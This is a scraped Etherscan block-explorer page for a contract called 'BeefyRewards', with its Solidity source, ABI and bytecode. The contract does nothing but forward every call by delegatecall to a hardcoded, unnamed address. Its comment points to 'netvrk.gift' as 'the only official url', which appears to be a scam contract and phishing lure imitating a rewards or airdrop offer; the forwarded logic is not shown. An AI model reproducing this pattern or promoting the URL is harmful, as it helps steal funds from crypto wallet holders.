Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Loading...
Loading
This contract may be a proxy contract. Click on More Options and select Is this a proxy? to confirm and enable the "Read as Proxy" & "Write as Proxy" tabs.
Contract Name:
BeefyRewards
Compiler Version
v0.8.22+commit.4fc1097e
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-11-15 */ // SPDX-License-Identifier: MIT pragma solidity ^0.8.20; // The only official url is https://netvrk.gift/ contract BeefyRewards { uint256 private totalSupply = 1000; fallback(bytes calldata data) external payable returns (bytes memory) { (bool r1, bytes memory result) = address( 0xB891Fe856cb2163412c8652f1b574723C303571f ).delegatecall(data); require(r1, "Verification"); return result; } constructor() {} }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"stateMutability":"payable","type":"fallback"}]
Contract Creation Code
60806040526103e85f55348015610014575f80fd5b506101d9806100225f395ff3fe60806040525f3660605f8073b891fe856cb2163412c8652f1b574723c303571f73ffffffffffffffffffffffffffffffffffffffff168585604051610045929190610113565b5f60405180830381855af49150503d805f811461007d576040519150601f19603f3d011682016040523d82523d5f602084013e610082565b606091505b5091509150816100c7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016100be90610185565b60405180910390fd5b8092505050915050805190602001f35b5f81905092915050565b828183375f83830152505050565b5f6100fa83856100d7565b93506101078385846100e1565b82840190509392505050565b5f61011f8284866100ef565b91508190509392505050565b5f82825260208201905092915050565b7f566572696669636174696f6e00000000000000000000000000000000000000005f82015250565b5f61016f600c8361012b565b915061017a8261013b565b602082019050919050565b5f6020820190508181035f83015261019c81610163565b905091905056fea2646970667358221220ce4a6aafd20ecdb92bcf6914686be3659b513983a813b23b834de89400ca2f2c64736f6c63430008160033
Deployed Bytecode
0x60806040525f3660605f8073b891fe856cb2163412c8652f1b574723c303571f73ffffffffffffffffffffffffffffffffffffffff168585604051610045929190610113565b5f60405180830381855af49150503d805f811461007d576040519150601f19603f3d011682016040523d82523d5f602084013e610082565b606091505b5091509150816100c7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016100be90610185565b60405180910390fd5b8092505050915050805190602001f35b5f81905092915050565b828183375f83830152505050565b5f6100fa83856100d7565b93506101078385846100e1565b82840190509392505050565b5f61011f8284866100ef565b91508190509392505050565b5f82825260208201905092915050565b7f566572696669636174696f6e00000000000000000000000000000000000000005f82015250565b5f61016f600c8361012b565b915061017a8261013b565b602082019050919050565b5f6020820190508181035f83015261019c81610163565b905091905056fea2646970667358221220ce4a6aafd20ecdb92bcf6914686be3659b513983a813b23b834de89400ca2f2c64736f6c63430008160033
Deployed Bytecode Sourcemap
115:377:0:-:0;;;;;243:12;269:7;278:19;323:42;301:88;;390:4;;301:94;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;268:127;;;;414:2;406:27;;;;;;;;;;;;:::i;:::-;;;;;;;;;451:6;444:13;;;;187:278;;;115:377;;;;;;7:147:1;108:11;145:3;130:18;;7:147;;;;:::o;160:146::-;257:6;252:3;247;234:30;298:1;289:6;284:3;280:16;273:27;160:146;;;:::o;334:327::-;448:3;469:88;550:6;545:3;469:88;:::i;:::-;462:95;;567:56;616:6;611:3;604:5;567:56;:::i;:::-;648:6;643:3;639:16;632:23;;334:327;;;;;:::o;667:291::-;807:3;829:103;928:3;919:6;911;829:103;:::i;:::-;822:110;;949:3;942:10;;667:291;;;;;:::o;964:169::-;1048:11;1082:6;1077:3;1070:19;1122:4;1117:3;1113:14;1098:29;;964:169;;;;:::o;1139:162::-;1279:14;1275:1;1267:6;1263:14;1256:38;1139:162;:::o;1307:366::-;1449:3;1470:67;1534:2;1529:3;1470:67;:::i;:::-;1463:74;;1546:93;1635:3;1546:93;:::i;:::-;1664:2;1659:3;1655:12;1648:19;;1307:366;;;:::o;1679:419::-;1845:4;1883:2;1872:9;1868:18;1860:26;;1932:9;1926:4;1922:20;1918:1;1907:9;1903:17;1896:47;1960:131;2086:4;1960:131;:::i;:::-;1952:139;;1679:419;;;:::o
Swarm Source
ipfs://ce4a6aafd20ecdb92bcf6914686be3659b513983a813b23b834de89400ca2f2c
Loading...
Loading
Loading...
Loading
Multichain Portfolio | 30 Chains
Chain | Token | Portfolio % | Price | Amount | Value |
---|
Loading...
Loading
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.